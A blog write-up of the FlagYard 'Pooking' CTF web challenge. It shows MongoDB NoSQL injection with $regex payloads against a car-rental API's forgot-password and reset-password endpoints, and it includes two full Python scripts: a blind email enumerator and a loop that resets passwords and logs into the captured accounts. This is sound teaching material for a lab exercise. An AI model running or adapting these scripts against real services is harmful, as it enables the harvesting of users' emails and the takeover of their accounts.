m7eesn blog

Pooking [WEB] (Medium) - FlagYard

1. Challenge Overview

Challenge Description

Explore the cars world with Pooking.com

Pooking is a web challenge from FlagYard about a car rental portal. The front page is harmless, but the API that powers it exposes several JSON endpoints:

The challenge is to obtain customer accounts (and ultimately the flag) without knowing any credentials up front. During recon we noticed that every request body we send is forwarded directly into MongoDB. That gives us the classic NoSQL-injection playground: if we embed operators such as $regex, the server evaluates them instead of treating them as plain strings.


2. Reconnaissance Notes

  1. Forgot Password accepts regex.
    Sending {"email":{"$regex":"^a"}} returns HTTP 200 whenever a stored email starts with “a”. The server clearly runs db.users.findOne(req.body.email) without sanitizing the payload.

  2. Reset Password validates tokens with user input.
    We tested {"token":{"$regex":"^.*"},"newPassword":"password"} and the backend happily accepted it, proving it evaluates the regex operator and therefore matches any token document.

  3. Book-Car is a dead end for leakage.
    We tried replacing strings with $regex there as well. The API simply echoed our JSON in the response, which told us it was performing an insert rather than a read. No data exfiltration through that route.

With those observations we had a route to victory: enumerate every email via forgot-password, then brute-force the reset endpoint until each account’s password was replaced with a value we control.


3. Building the Email Enumerator (mail_extractor.py)

Manual probing with curl is miserable, so we wrote an automated harvester.

Key ideas inside mail_extractor.py:

Result: We harvested 34 valid emails.

#!/usr/bin/env python3
import os
import re
import string
import sys
from typing import Iterable

import requests

# Target endpoint whose request body is forwarded unsanitized into MongoDB.
URL = "http://your_url.playat.flagyard.com/api/forgot-password"
# Headers mimicking a browser request from the challenge origin.
HEADERS: dict[str, str] = {
    "Content-Type": "application/json",
    "Origin": "http://your_url.playat.flagyard.com",
    "User-Agent": "Mozilla/5.0",
}
REGEX_OPTIONS = "i" # case-insensitive matching

# Alphabet used to extend a candidate prefix one character at a time.
CHARSET: list[str] = list(string.ascii_lowercase +  string.digits + "@_-.")

# Hard cap on the length of any enumerated email.
MAX_LEN = 80
# Verified addresses are persisted here so interrupted runs can resume.
SAVE_FILE = "emails_found.txt"
# Create the save file up front so later reads never hit FileNotFoundError.
if not os.path.exists(SAVE_FILE):
    with open(SAVE_FILE, "w") as f:
        pass
    
# Optional extra wordlist; only its domain parts are harvested.
EXTRA_EMAILS_FILE = "emails.txt"

# Seed domains tried as full-address guesses once a local part is known.
DEFAULT_DOMAINS: set[str] = {
    "gmail.com",
    "outlook.com",
    "hotmail.com",
    "live.com",
    "yahoo.com",
    "icloud.com",
}

def probe_regex(regex: str) -> "tuple[bool, requests.Response | None]":
    """Send a ``$regex`` payload to the forgot-password endpoint.

    Returns ``(hit, response)`` where *hit* is True when the server answered
    HTTP 200, i.e. at least one stored email matched *regex*. On a network
    failure the response is None.
    """
    payload: dict = {"email": {"$regex": regex}}
    if REGEX_OPTIONS:
        # Ask Mongo for case-insensitive matching when configured.
        payload["email"]["$options"] = REGEX_OPTIONS

    try:
        # Keep the try body minimal: only the network call can legitimately fail.
        r = requests.post(
            URL, json=payload, headers=HEADERS, timeout=10, allow_redirects=False
        )
    except requests.RequestException as e:
        # Narrow catch: network/HTTP errors only, so programming bugs surface.
        print("request error:", e)
        return False, None
    return r.status_code == 200, r


def build_known_paths(emails: set[str]) -> dict[str, set[str]]:
    """Map each lowercased prefix to the set of next characters observed in known emails."""
    paths: dict[str, set[str]] = {}
    for address in emails:
        normalized = address.lower()
        # Every position i contributes the edge prefix[:i] -> prefix[i].
        for position, char in enumerate(normalized):
            paths.setdefault(normalized[:position], set()).add(char)
    return paths


def extract_domains(emails: Iterable[str]) -> set[str]:
    """Collect the lowercased domain part of every address that contains an '@'."""
    return {
        address.split("@", 1)[1].lower()
        for address in emails
        if "@" in address
    }


def load_domain_candidates(found_emails: set[str], extra_paths: list[str] | None = None) -> set[str]:
    """Build the candidate-domain pool.

    Combines the default seed domains, the domains of already-verified
    emails, and any domains harvested from optional wordlist files.
    """
    candidates = DEFAULT_DOMAINS | extract_domains(found_emails)

    for wordlist in extra_paths or []:
        # Skip blank entries and paths that do not exist.
        if not wordlist or not os.path.exists(wordlist):
            continue
        try:
            with open(wordlist, "r") as handle:
                for raw in handle:
                    entry = raw.strip()
                    if "@" in entry:
                        candidates.add(entry.split("@", 1)[1].lower())
        except OSError as e:
            print(f"warning: unable to read {wordlist}: {e}")
    return candidates


def try_domain_guesses(
    local_part: str,
    domain_prefix: str,
    known_domains: set[str],
    found: set[str],
    found_lower: set[str],
    tested_exact: set[str],
    domain_guess_attempted: set[str],
    known_paths: dict[str, set[str]],
    prune_prefixes: set[str],
    verified_domains_by_local: dict[str, set[str]],
):
    """Attempt full domain combinations based on known domains.

    For a partially enumerated address ``local_part@domain_prefix...``, try
    completing it with every known domain that starts with *domain_prefix*.
    All set/dict parameters are shared caller state and are mutated in place
    so the enumerator immediately benefits from any verified hit.
    """
    domain_prefix_lower = domain_prefix.lower()
    # sorted() gives a deterministic guess order across runs.
    for domain in sorted(known_domains):
        if not domain.startswith(domain_prefix_lower):
            continue
        guess = f"{local_part}@{domain}"
        guess_lower = guess.lower()
        # Skip anything already verified or already attempted this session.
        if guess_lower in found_lower or guess_lower in domain_guess_attempted:
            continue
        domain_guess_attempted.add(guess_lower)
        if verify_exact(guess):
            print(f" VERIFIED (domain guess): {guess}")
            found.add(guess)
            found_lower.add(guess_lower)
            known_domains.add(domain)
            # Prune the DFS: no need to keep extending this address.
            prune_prefixes.add(guess_lower)
            verified_domains_by_local.setdefault(local_part.lower(), set()).add(domain)
            # Persist immediately so progress survives interruption.
            persist_found(sorted(found, key=str.lower), SAVE_FILE)
            # Rebuild in place (clear+update) so the caller's reference stays valid.
            known_paths.clear()
            known_paths.update(build_known_paths(found))
        else:
            tested_exact.add(guess_lower)


def build_char_order(prefix: str, known_paths: dict[str, set[str]]) -> list[str]:
    """Order characters so continuations already seen in known emails are tried last."""
    deferred = known_paths.get(prefix.lower(), set())
    # Two passes over CHARSET keep each group in its original relative order.
    fresh = [ch for ch in CHARSET if ch.lower() not in deferred]
    seen = [ch for ch in CHARSET if ch.lower() in deferred]
    return fresh + seen


def enumerate_prefixes(
    start_prefix: str = "",
    known_paths: dict[str, set[str]] | None = None,
    prune_prefixes: set[str] | None = None,
    verified_domains_by_local: dict[str, set[str]] | None = None,
):
    """Depth-first enumerate all prefixes that produce regex hits.

    Generator: yields ``(candidate, attempt_counter)`` for every prefix whose
    anchored regex probe returns a hit. The shared *prune_prefixes* and
    *verified_domains_by_local* structures may be mutated by the caller
    between yields to cut off already-resolved branches.
    """
    if known_paths is None:
        known_paths = {}
    if prune_prefixes is None:
        prune_prefixes = set()
    if verified_domains_by_local is None:
        verified_domains_by_local = {}
    attempt_counter = 0
    # stack entries: (prefix, next_index, tried_normalized_chars, char_order)
    stack: list[tuple[str, int, set[str], list[str]]] = [
        (start_prefix, 0, set(), build_char_order(start_prefix, known_paths))
    ]
    while stack:
        prefix, idx, tried_norm, char_order = stack[-1]
        prefix_lower = prefix.lower()

        # If this prefix or any of its extensions are already fully resolved, skip.
        if any(prefix_lower.startswith(p) for p in prune_prefixes):
            stack.pop()
            continue

        if "@" in prefix:
            # Once past the '@', stop exploring if a verified domain for this
            # local part already covers the current domain prefix.
            local_part, domain_part = prefix_lower.split("@", 1)
            domains = verified_domains_by_local.get(local_part)
            if domains:
                should_pop = False
                for domain in domains:
                    if domain.startswith(domain_part):
                        should_pop = True
                        break
                if should_pop:
                    stack.pop()
                    continue

        # advance idx until we find a character whose normalized form we have not tried yet
        while idx < len(char_order) and char_order[idx].lower() in tried_norm:
            idx += 1

        # Exhausted this level (or hit the length cap): backtrack.
        if idx >= len(char_order) or len(prefix) >= MAX_LEN:
            stack.pop()
            continue

        ch = char_order[idx]
        tried_norm.add(ch.lower())
        # Record our resume point before probing, since we may push a child frame.
        stack[-1] = (prefix, idx + 1, tried_norm, char_order)

        candidate = prefix + ch
        # Escape the literal prefix so charset characters like '.' match literally.
        regex: str = "^" + re.escape(candidate) + ".*"
        attempt_counter += 1
        sys.stdout.write(f"\rAttempt {attempt_counter:>6}: trying '{candidate}'")
        sys.stdout.flush()
        hit, _ = probe_regex(regex)
        if not hit:
            continue

        sys.stdout.write(f"\rAttempt {attempt_counter:>6}: ✓ '{candidate}'\n")
        sys.stdout.flush()

        candidate_lower = candidate.lower()

        # Descend into the hit prefix unless it is already fully resolved.
        if len(candidate) < MAX_LEN and candidate_lower not in prune_prefixes:
            stack.append(
                (candidate, 0, set(), build_char_order(candidate, known_paths))
            )

        yield candidate, attempt_counter


def plausible_email(s: str) -> bool:
    """Heuristic: *s* looks like an email if it contains '@' and the part
    after the last '@' contains a dot."""
    # Return the boolean expression directly instead of if/return True/False.
    return "@" in s and "." in s.split("@")[-1]


def verify_exact(email) -> bool:
    """Confirm a full address exists via a fully anchored, escaped regex."""
    anchored = f"^{re.escape(email)}$"
    matched, _ = probe_regex(anchored)
    return matched


def load_existing_found(path: str) -> set[str]:
    """Read previously verified emails from *path*, one per line.

    Returns an empty set when the file does not exist; blank lines are ignored
    and surrounding whitespace is stripped.
    """
    if not os.path.exists(path):
        return set()
    collected: set[str] = set()
    with open(path, "r") as handle:
        for raw in handle:
            entry = raw.strip()
            if entry:
                collected.add(entry)
    return collected


def persist_found(sorted_emails: list[str], path: str) -> None:
    """Overwrite *path* with the given emails, one per line."""
    lines = [email + "\n" for email in sorted_emails]
    with open(path, "w") as sink:
        sink.writelines(lines)


if __name__ == "__main__":
    # Resume from any previously verified emails on disk.
    found = load_existing_found(SAVE_FILE)
    found_lower = {email.lower() for email in found}
    # Candidates whose exact-match probe already failed this session.
    tested_exact: set[str] = set()
    known_paths = build_known_paths(found)
    known_domains = load_domain_candidates(found, extra_paths=[EXTRA_EMAILS_FILE])
    domain_guess_attempted: set[str] = set()
    # Fully resolved addresses: the DFS stops extending these prefixes.
    prune_prefixes: set[str] = set(found_lower)
    verified_domains_by_local: dict[str, set[str]] = {}
    for email in found_lower:
        if "@" in email:
            local, domain = email.split("@", 1)
            verified_domains_by_local.setdefault(local, set()).add(domain)

    if found:
        print(f"Loaded {len(found)} known email(s) from {SAVE_FILE}.")

    try:
        # The enumerator yields every prefix that produced a regex hit; the
        # shared sets are mutated below so pruning takes effect immediately.
        for candidate, attempt_no in enumerate_prefixes("", known_paths, prune_prefixes, verified_domains_by_local):
            candidate_lower = candidate.lower()
            if candidate_lower in found_lower:
                continue

            if candidate_lower in tested_exact:
                continue

            if "@" in candidate:
                # Once the '@' appears, shortcut with known-domain guesses.
                local_part, domain_prefix = candidate.split("@", 1)
                if local_part:
                    try_domain_guesses(
                        local_part,
                        domain_prefix,
                        known_domains,
                        found,
                        found_lower,
                        tested_exact,
                        domain_guess_attempted,
                        known_paths,
                        prune_prefixes,
                        verified_domains_by_local,
                    )

            if plausible_email(candidate):
                tested_exact.add(candidate_lower)
                if verify_exact(candidate):
                    print(f" VERIFIED: {candidate}")
                    found.add(candidate)
                    found_lower.add(candidate_lower)
                    prune_prefixes.add(candidate_lower)
                    # Persist immediately so progress survives interruption.
                    persist_found(sorted(found, key=str.lower), SAVE_FILE)
                    # Rebuild in place so existing references stay valid.
                    known_paths.clear()
                    known_paths.update(build_known_paths(found))
                    if "@" in candidate:
                        domain = candidate.split("@", 1)[1].lower()
                        known_domains.add(domain)
                        verified_domains_by_local.setdefault(
                            candidate.split("@", 1)[0].lower(), set()
                        ).add(domain)
                else:
                    print(f" plausible but not exact yet: {candidate}")
    except KeyboardInterrupt:
        # Ctrl-C is expected during long runs; results are already on disk.
        print("\nInterrupted by user.")

    if found:
        print(f"\nCurrent collected emails ({len(found)} total):")
        for e in sorted(found, key=str.lower):
            print("-", e)
    else:
        print("No verified emails collected yet.")

4. Weaponizing the Reset Endpoint (execute_requests.py)

Resetting passwords one-by-one with curl is error-prone, especially because the $regex token bypass occasionally resets the wrong user (whichever Mongo returns first). The helper script automates the entire workflow safely:

  1. Preflight login.
    For each email in emails_found.txt, the script first tries to log in with our chosen password. If that already works we skip the reset loop entirely.

  2. Trigger token generation.
    We still call /api/forgot-password to ensure the backend creates or refreshes a reset token.

  3. Reset & login loop (up to 100 attempts, per MAX_RESET_ATTEMPTS in the script).

    • POST {"token":{"$regex":"^.*"},"newPassword":"password"} to /api/reset-password.
    • Immediately attempt login.
    • Record both responses for later analysis.
    • Break early if the login succeeds.
  4. Logging.
    Each result is saved to login_results.json with status codes and response snippets so we can prove which accounts were taken over.

By iterating this loop we eventually hit the correct token document for each target user. Once their password was set, the plain login endpoint granted us full access. We added an if statement to check whether the response contained the flag format, and sure enough one of the accounts held the prize.

The power of hindsight: if we had inverted the order of digits vs letters in the charset, we could have shaved hours off the enumeration time. Still, the scripts worked reliably and eventually got us the flag.

#!/usr/bin/env python3
import json
import sys
from pathlib import Path
from typing import Any, Dict, Optional

import requests

# Root of the target application; all API paths are joined onto this.
BASE_URL = "http://your_url.playat.flagyard.com"
# The password we force onto every account via the reset bypass.
PASSWORD = "password"
# Upper bound on reset+login cycles per email (token selection is effectively random).
MAX_RESET_ATTEMPTS = 100

BASE_HEADERS = {
    "Content-Type": "application/json",
    "Accept": "*/*",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
}

# NoSQL-injection body: the $regex matches ANY stored reset token.
RESET_PAYLOAD = {"token": {"$regex": "^.*"}, "newPassword": PASSWORD}


def request_login(email: str, password: str) -> requests.Response:
    """POST the given credentials to /api/login and return the raw response."""
    credentials = {"email": email, "password": password}
    return requests.post(
        f"{BASE_URL}/api/login", json=credentials, headers=BASE_HEADERS
    )

def request_forgot(email: str) -> requests.Response:
    """Ask /api/forgot-password to (re)generate a reset token for *email*."""
    body = {"email": email}
    return requests.post(
        f"{BASE_URL}/api/forgot-password", json=body, headers=BASE_HEADERS
    )

def request_reset(payload: Optional[Dict[str, Any]] = None) -> requests.Response:
    """POST a reset-password body; defaults to the $regex token-bypass payload.

    Uses an explicit None check instead of ``payload or RESET_PAYLOAD`` so a
    caller-supplied empty dict is sent as-is rather than being silently
    replaced by the default.
    """
    body = RESET_PAYLOAD if payload is None else payload
    return requests.post(f"{BASE_URL}/api/reset-password", json=body, headers=BASE_HEADERS)


# Abort early with a pointer to the enumeration script if there is no input.
emails_file = Path("emails_found.txt")
if not emails_file.exists():
    print(f"Emails file '{emails_file}' not found. Please run mail_extractor.py first.")
    sys.exit(1)

# Keep only non-empty, whitespace-stripped lines as target addresses.
emails: list[str] = [
    entry
    for entry in (raw.strip() for raw in emails_file.read_text().splitlines())
    if entry
]

# Store login results (one dict per processed email, dumped to JSON at the end)
login_results = []

# Process each email: preflight login, then reset+login cycles until success.
for email in emails:
    print(f"\n{'=' * 60}")
    print(f"Processing email: {email}")
    print("=" * 60)

    result: Dict[str, Any] = {"email": email, "attempts": []}

    try:
        # Step 0: preflight login check — a previous run may have already
        # reset this account to our password.
        print(f"\n[0/3] Checking existing login for {email}...")
        preflight_login = request_login(email, PASSWORD)
        print(f"Response Status: {preflight_login.status_code}")
        print(f"Response: {preflight_login.text[:200]}")
        result["preflight_status"] = preflight_login.status_code

        if preflight_login.status_code == 200:
            print("Login already successful; skipping reset workflow.")
            try:
                if "flag" in preflight_login.text.lower():
                    print("Flag detected in reset response!")
                    print(f"Response: {preflight_login.text}")
                    # sys.exit raises SystemExit (a BaseException), so the
                    # surrounding `except Exception` does not swallow it.
                    sys.exit(0)
                result["response"] = preflight_login.json()
            except Exception:
                # Non-JSON body: record the raw text instead.
                result["response"] = {
                    "raw": preflight_login.text,
                    "status_code": preflight_login.status_code,
                }
            result["status_code"] = preflight_login.status_code
            result["skipped_reset"] = True
            login_results.append(result)
            continue

        # Step 1: Request password reset token generation
        print(f"\n[1/3] Requesting password reset for {email}...")
        forgot_response = request_forgot(email)
        print(f"Response Status: {forgot_response.status_code}")
        print(f"Response: {forgot_response.text[:200]}")
        result["forgot_status"] = forgot_response.status_code
        result["forgot_response_snippet"] = forgot_response.text[:200]

        final_login_status: Optional[int] = None
        final_login_json: Optional[Dict[str, Any]] = None

        # Steps 2 & 3: Attempt reset + login cycles. The $regex bypass resets
        # whichever token Mongo matches first, so we loop until OUR account
        # is the one that got reset (login succeeds).
        for attempt in range(1, MAX_RESET_ATTEMPTS + 1):
            print(
                f"\n[2/3] Resetting password (attempt {attempt}/{MAX_RESET_ATTEMPTS})..."
            )
            reset_response = request_reset()
            print(f"Response Status: {reset_response.status_code}")
            reset_text = reset_response.text[:200]
            print(f"Response: {reset_text}")

            if "flag" in reset_response.text.lower():
                print("Flag detected in reset response!")
                print(f"Response: {reset_response.text}")
                sys.exit(0)

            print("\n[3/3] Attempting login with email and password...")
            login_response = request_login(email, PASSWORD)
            print(f"Response Status: {login_response.status_code}")
            print(f"Response: {login_response.text[:200]}")

            try:
                login_json = login_response.json()
            except Exception:
                # Non-JSON login body: keep a truncated raw copy for the log.
                login_json = {
                    "raw": login_response.text[:200],
                    "status_code": login_response.status_code,
                }

            # Record every cycle so we can prove which accounts were taken over.
            result["attempts"].append(
                {
                    "attempt": attempt,
                    "reset_status": reset_response.status_code,
                    "reset_response_snippet": reset_text,
                    "login_status": login_response.status_code,
                    "login_response": login_json,
                }
            )

            if login_response.status_code == 200:
                final_login_status = login_response.status_code
                final_login_json = login_json
                print("Login succeeded after reset.")
                break

        if final_login_status is None:
            # Capture last login response even if failure
            final_login_status = (
                result["attempts"][-1]["login_status"] if result["attempts"] else None
            )
            final_login_json = (
                result["attempts"][-1]["login_response"] if result["attempts"] else None
            )

        result["status_code"] = final_login_status
        result["response"] = final_login_json

    except Exception as e:
        # Best-effort per-email handling: log the error and move on.
        print(f"Error processing {email}: {e}")
        result["error"] = str(e)

    login_results.append(result)

# Serialize once, then both print and persist the same JSON text.
serialized = json.dumps(login_results, indent=2)
banner = "=" * 60
print(f"\n\n{banner}")
print("FINAL LOGIN RESULTS (JSON):")
print(banner)
print(serialized)
Path("login_results.json").write_text(serialized)

5. Conclusion

The challenge demonstrated classic NoSQL injection techniques, leveraging regex operators to enumerate user emails and reset passwords. While the exploitation process was straightforward, it required careful automation to handle the brute-force nature of the reset token guessing. The provided scripts effectively automated the enumeration and exploitation steps, ultimately leading to the successful retrieval of the flag.

I personally did not enjoy the challenge due to the extensive brute forcing and waiting times involved, which detracted from the overall experience. However, it served as a practical exercise in blind NoSQL injection techniques and automation strategies.

PS: There might be other ways to solve the challenge; this is the only approach I found that produced results.